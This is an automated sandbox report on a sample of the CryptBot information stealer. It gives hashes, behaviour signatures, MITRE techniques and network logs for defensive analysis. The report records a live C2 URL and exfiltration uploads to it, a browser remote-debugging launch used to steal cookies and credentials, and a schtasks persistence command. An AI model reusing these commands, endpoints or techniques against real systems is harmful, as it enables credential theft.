Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
18/02/2025, 13:45 UTC
General
-
Target
open-need-this-548.exe
-
Size
9.1MB
-
MD5
cb871641fdeeae993752fa4f5a9ce40b
-
SHA1
c4ce33b0d1bd3793661ad46f4e89251fc98d8278
-
SHA256
baaafe3a19db746baca67075a25066153cbe0bce08da3d536d9f76cd8182fd85
-
SHA512
1ec42e576fb562296683ecdfb26e4818ad7580de626686baab5de728cc38ee79c8f78dbd8ad78e2bc465685804fd42aa188bfa06387a8cb321b9eb17f6586d5b
-
SSDEEP
49152:K4RLvVjkP+8lZ3xp+q32Jc/APchP3Nz42XgYPxA2kUhUWQhboqxsKJb3HPyz8d72:K41G+8lVRmJgYch3RNwYqwSAKNyz8dy
Score
10/10
Malware Config
Extracted
Family
cryptbot
C2
http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807
Signatures
-
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\open-need-this-548.exe"C:\Users\Admin\AppData\Local\Temp\open-need-this-548.exe"1⤵
- Enumerates VirtualBox registry keys
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbdb47cc40,0x7ffbdb47cc4c,0x7ffbdb47cc583⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1944 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1936,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1992 /prefetch:33⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2428 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4316,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4540,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4312 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,2880110464290854183,18043362812054582320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4920 /prefetch:83⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 16282⤵
- Program crash
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1796 -ip 17961⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
Network
-
DNShttpbin.orgRemote address:8.8.8.8:53Requesthttpbin.orgIN AResponsehttpbin.orgIN A3.208.239.150httpbin.orgIN A3.83.211.175httpbin.orgIN A54.84.170.143httpbin.orgIN A3.214.119.249 -
DNShttpbin.orgRemote address:8.8.8.8:53Requesthttpbin.orgIN AAAAResponse
-
DNSg.bing.comRemote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.ax-0001.ax-msedge.netg-bing-com.ax-0001.ax-msedge.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=162CB6F0469D661E1EF9A3674716677B; domain=.bing.com; expires=Sun, 15-Mar-2026 13:46:10 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AD5372C263A24ADCA84E5A36B561976C Ref B: FRA31EDGE0515 Ref C: 2025-02-18T13:46:10Z
date: Tue, 18 Feb 2025 13:46:10 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=162CB6F0469D661E1EF9A3674716677B
ResponseHTTP/2.0 204
cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=-S0vlGToECRtBYJ1Ih-f-fwXGt4UBXQOgC4sHvtO0dE; domain=.bing.com; expires=Sun, 15-Mar-2026 13:46:10 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A31A9FFA873C445AB6522677EE1DB433 Ref B: FRA31EDGE0515 Ref C: 2025-02-18T13:46:10Z
date: Tue, 18 Feb 2025 13:46:10 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=162CB6F0469D661E1EF9A3674716677B; MSPTC=-S0vlGToECRtBYJ1Ih-f-fwXGt4UBXQOgC4sHvtO0dE
ResponseHTTP/2.0 204
cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EACA3EF876224F4D90090096628DFF59 Ref B: FRA31EDGE0515 Ref C: 2025-02-18T13:46:10Z
date: Tue, 18 Feb 2025 13:46:10 GMT
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AResponse
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AAAAResponsehome.thrtcc13vs.topIN A166.1.36.226
-
POSThttp://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807Remote address:166.1.36.226:80RequestPOST /HQLTbjPjafkPSoCHIYmY1739702807 HTTP/1.1
Host: home.thrtcc13vs.top
Accept: */*
Content-Type: application/json
Content-Length: 444070
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Feb 2025 13:46:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 26
Connection: close
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AResponsehome.thrtcc13vs.topIN A166.1.36.226
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AAAAResponse
-
GEThttp://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807?argument=MBRJFHstmihRdagy1739886373Remote address:166.1.36.226:80RequestGET /HQLTbjPjafkPSoCHIYmY1739702807?argument=MBRJFHstmihRdagy1739886373 HTTP/1.1
Host: home.thrtcc13vs.top
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Feb 2025 13:46:14 GMT
Content-Type: application/octet-stream
Content-Length: 10816560
Connection: close
Content-Disposition: attachment; filename="FfieETKEjdIvlrqxJIa;"
Last-Modified: Sun, 16 Feb 2025 10:46:48 GMT
Cache-Control: no-cache
ETag: "1739702808.1499119-10816560-3133085935"
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AResponsethrtcc13vs.topIN A166.1.36.226
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AAAAResponse
-
POSThttp://thrtcc13vs.top/v1/upload.phpRemote address:166.1.36.226:80RequestPOST /v1/upload.php HTTP/1.1
Host: thrtcc13vs.top
Accept: */*
Content-Length: 465
Content-Type: multipart/form-data; boundary=------------------------WsuO5yVDd43MXMeT1FcOSu
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Feb 2025 13:46:25 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
X-RateLimit-Limit: 30
X-RateLimit-Remaining: 29
X-RateLimit-Reset: 1739888186
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AResponsethrtcc13vs.topIN A166.1.36.226
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AAAAResponse
-
POSThttp://thrtcc13vs.top/v1/upload.phpRemote address:166.1.36.226:80RequestPOST /v1/upload.php HTTP/1.1
Host: thrtcc13vs.top
Accept: */*
Content-Length: 70755
Content-Type: multipart/form-data; boundary=------------------------kGcKgZvZVKyQ9YOIt2Q3kc
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Feb 2025 13:46:26 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
X-RateLimit-Limit: 30
X-RateLimit-Remaining: 28
X-RateLimit-Reset: 1739888186
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNSclients2.google.comRemote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A172.217.169.78
-
GEThttps://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1Remote address:172.217.169.78:443RequestGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=25.SE=EAZzCPS0NtSBHaKiecUC7lqf6SKYBdNR_xaBQzc9Et4dDjU0_6cPqqaWE7yssa9ord4fG0EB2yPxmJvUiMtQs7B9W7c02Kob4Ka_XGKCJIPy91Xq0jhNfP8jXPg0DJZCZy0PWXrq_KMDp_BqQFkmQ_2IYIrcvJMuB32lsdTptz9ppH73zSv8qrh28H5uywOX4C0
-
DNSwww.google.comRemote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.200.4
-
DNSogads-pa.googleapis.comRemote address:8.8.8.8:53Requestogads-pa.googleapis.comIN AResponseogads-pa.googleapis.comIN A142.250.200.42ogads-pa.googleapis.comIN A216.58.204.74ogads-pa.googleapis.comIN A142.250.178.10ogads-pa.googleapis.comIN A142.250.200.10ogads-pa.googleapis.comIN A172.217.169.10ogads-pa.googleapis.comIN A142.250.179.234ogads-pa.googleapis.comIN A142.250.180.10ogads-pa.googleapis.comIN A216.58.213.10ogads-pa.googleapis.comIN A142.250.187.234ogads-pa.googleapis.comIN A142.250.187.202ogads-pa.googleapis.comIN A216.58.212.202ogads-pa.googleapis.comIN A216.58.201.106ogads-pa.googleapis.comIN A172.217.169.42ogads-pa.googleapis.comIN A172.217.169.74ogads-pa.googleapis.comIN A172.217.16.234
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AResponsethrtcc13vs.topIN A166.1.36.226
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AAAAResponse
-
POSThttp://thrtcc13vs.top/v1/upload.phpRemote address:166.1.36.226:80RequestPOST /v1/upload.php HTTP/1.1
Host: thrtcc13vs.top
Accept: */*
Content-Length: 26366
Content-Type: multipart/form-data; boundary=------------------------IF8mYV7xEcjlsIsHHt85qq
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Feb 2025 13:46:32 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
X-RateLimit-Limit: 30
X-RateLimit-Remaining: 27
X-RateLimit-Reset: 1739888186
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AResponse
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AAAAResponsehome.thrtcc13vs.topIN A166.1.36.226
-
POSThttp://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807Remote address:166.1.36.226:80RequestPOST /HQLTbjPjafkPSoCHIYmY1739702807 HTTP/1.1
Host: home.thrtcc13vs.top
Accept: */*
Content-Type: application/json
Content-Length: 56
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Feb 2025 13:46:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4
Connection: close
-
3.208.239.150:443httpbin.orgtls
-
150.171.28.10:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=tls, http2
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=525035b58d4444f1aff909e7267ddd19&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=HTTP Response
204 -
166.1.36.226:80http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807http
HTTP Request
POST http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807HTTP Response
200 -
166.1.36.226:80http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807?argument=MBRJFHstmihRdagy1739886373http
HTTP Request
GET http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807?argument=MBRJFHstmihRdagy1739886373HTTP Response
200 -
166.1.36.226:80http://thrtcc13vs.top/v1/upload.phphttp
HTTP Request
POST http://thrtcc13vs.top/v1/upload.phpHTTP Response
200 -
166.1.36.226:80http://thrtcc13vs.top/v1/upload.phphttp
HTTP Request
POST http://thrtcc13vs.top/v1/upload.phpHTTP Response
200 -
172.217.169.78:443https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1tls, http2
HTTP Request
GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1 -
142.250.200.42:443ogads-pa.googleapis.comtls, http2
-
127.0.0.1:9222 -
127.0.0.1:9222
-
166.1.36.226:80http://thrtcc13vs.top/v1/upload.phphttp
HTTP Request
POST http://thrtcc13vs.top/v1/upload.phpHTTP Response
200 -
166.1.36.226:80http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807http
HTTP Request
POST http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807HTTP Response
200
-
8.8.8.8:53httpbin.orgdns
DNS Request
httpbin.org
DNS Request
httpbin.org
DNS Response
3.208.239.1503.83.211.17554.84.170.1433.214.119.249
-
8.8.8.8:53g.bing.comdns
DNS Request
g.bing.com
DNS Response
150.171.28.10150.171.27.10
-
8.8.8.8:53home.thrtcc13vs.topdns
DNS Request
home.thrtcc13vs.top
DNS Request
home.thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53home.thrtcc13vs.topdns
DNS Request
home.thrtcc13vs.top
DNS Request
home.thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53thrtcc13vs.topdns
DNS Request
thrtcc13vs.top
DNS Request
thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53thrtcc13vs.topdns
DNS Request
thrtcc13vs.top
DNS Request
thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53clients2.google.comdns
DNS Request
clients2.google.com
DNS Response
172.217.169.78
-
8.8.8.8:53www.google.comdns
DNS Request
www.google.com
DNS Response
142.250.200.4
-
142.250.200.4:443www.google.comhttps
-
8.8.8.8:53ogads-pa.googleapis.comdns
DNS Request
ogads-pa.googleapis.com
DNS Response
142.250.200.42216.58.204.74142.250.178.10142.250.200.10172.217.169.10142.250.179.234142.250.180.10216.58.213.10142.250.187.234142.250.187.202216.58.212.202216.58.201.106172.217.169.42172.217.169.74172.217.16.234
-
142.250.200.42:443ogads-pa.googleapis.comhttps
-
127.0.0.1:59646
-
8.8.8.8:53thrtcc13vs.topdns
DNS Request
thrtcc13vs.top
DNS Request
thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53home.thrtcc13vs.topdns
DNS Request
home.thrtcc13vs.top
DNS Request
home.thrtcc13vs.top
DNS Response
166.1.36.226
MITRE ATT&CK Enterprise v15
Persistence
Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
72KB
-
Filesize
10.4MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
1.2MB